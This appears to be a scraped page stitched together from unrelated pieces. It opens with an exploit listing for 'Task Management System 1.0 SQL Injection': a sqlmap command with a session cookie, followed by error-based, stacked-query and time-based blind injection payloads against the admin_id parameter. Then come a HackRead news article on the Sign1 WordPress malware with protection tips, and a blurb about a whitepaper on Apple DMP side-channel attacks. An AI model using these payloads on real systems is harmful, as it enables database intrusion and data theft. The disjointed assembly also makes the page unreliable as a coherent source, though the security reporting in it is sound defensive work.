-> sqlmap -u "http://localhost/taskmatic/taskmatic/update-admin.php?admin_id=1" --cookie="Cookie: PHPSESSID=plhvl5e53hbuvq9stj21mesirj" --batch -dbs  
---  
Parameter: admin_id (GET)  
    Type: error-based  
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
    Payload: admin_id=1' AND (SELECT 6339 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(6339=6339,1))),0x7176707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Ivgj

    Type: stacked queries  
    Title: MySQL >= 5.0.12 stacked queries (comment)  
    Payload: admin_id=1';SELECT SLEEP(5)#

    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: admin_id=1' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))mEAi)-- QnHT  
---

Task Management System 1.0 SQL Injection

By Waqas
Using a Wordpress website? Lookout for Sign1 malware!
This is a post from HackRead.com Read the original post: Thousands of WordPress Websites Hacked with New Sign1 Malware

Sign1 malware targets WordPress websites, injecting malicious code that redirects visitors to scams or bombards them with ads – Sucuri researchers discovered this evasive malware, urging website owners to update software and implement security measures to protect their sites.

Cybersecurity researchers at Sucuri have uncovered a concerning new malware campaign targeting **WordPress** websites. Dubbed “Sign1,” the malware injects malicious code into vulnerable websites, ultimately redirecting visitors to scam sites or bombarding them with unwanted pop-up ads.

The new malware discovery emerged shortly after Check Point Software Technologies Ltd. disclosed a malicious campaign named **FakeUpdates**, which specifically targeted WordPress websites with malware.

Sign1 malware’s stealthy tactics make it a significant threat. The malware leverages time-based **randomization** to generate dynamic URLs, making it difficult for security software to identify and block them. Additionally, the code itself is obfuscated, further hindering detection.

Perhaps most concerning is Sign1’s ability to target visitors from specific websites, such as popular search engines and social media platforms. This suggests a level of sophistication, potentially allowing attackers to focus on users they deem more susceptible to scams.

Sucuri’s **report** estimates that over 39,000 WordPress websites have been infected with Sign1 thus far. Website owners are urged to take immediate action to protect their sites and visitors.

****How to Protect Your WordPress Website from Sign1****

If you are using WordPress as your website’s content management system (CMS), here are some simple yet vital steps to protect the website from Sign1 and other similar malware:

*   Update WordPress core, themes, and plugins regularly. Outdated software often contains vulnerabilities that attackers exploit.
*   Implement strong security practices. This includes using secure passwords, enabling two-factor authentication, and keeping backups of your website data.
*   Use a reputable website security scanner. Regularly scan your website for malware and vulnerabilities.
*   Be cautious when installing plugins. Only install plugins from trusted sources and with good reviews.

Website owners who suspect their site may be infected with Sign1 malware should:

*   Contact a security professional or your **WordPress hosting company.** They can help identify and remove the malware.
*   Change all website passwords. This includes the WordPress admin password, FTP password, and database password.

Nevertheless, the discovery of Sign1 malware goes on to show the vulnerable state of websites. With more than 835 million sites using WordPress even a small threat could end up compromising a staggering number of sites.

It’s crucial to **stay informed** about the latest security vulnerabilities and take proactive steps to protect your website. Security researchers like Sucuri play a vital role in identifying and mitigating these threats.

1.  Hackers Hit WordPress Sites with Balada Malware
2.  Tips for Using Uploader Widgets on WordPress Blogs
3.  Zero-Day Exploit Threatens 200,000 WordPress Sites
4.  Database Malware Strikes Vulnerable WordPress Sites
5.  5 Signs your WordPress Site is Hacked (And How to Fix It)

Thousands of WordPress Websites Hacked with New Sign1 Malware

This whitepaper shows that the security threat from DMPs is significantly worse than previously thought and demonstrates the first end-to-end attacks on security-critical software using the Apple m-series DMP. Undergirding the author's attacks is a new understanding of how DMPs behave which shows, among other things, that the Apple DMP will activate on behalf of any victim program and attempt to leak any cached data that resembles a pointer.

Tag

#auth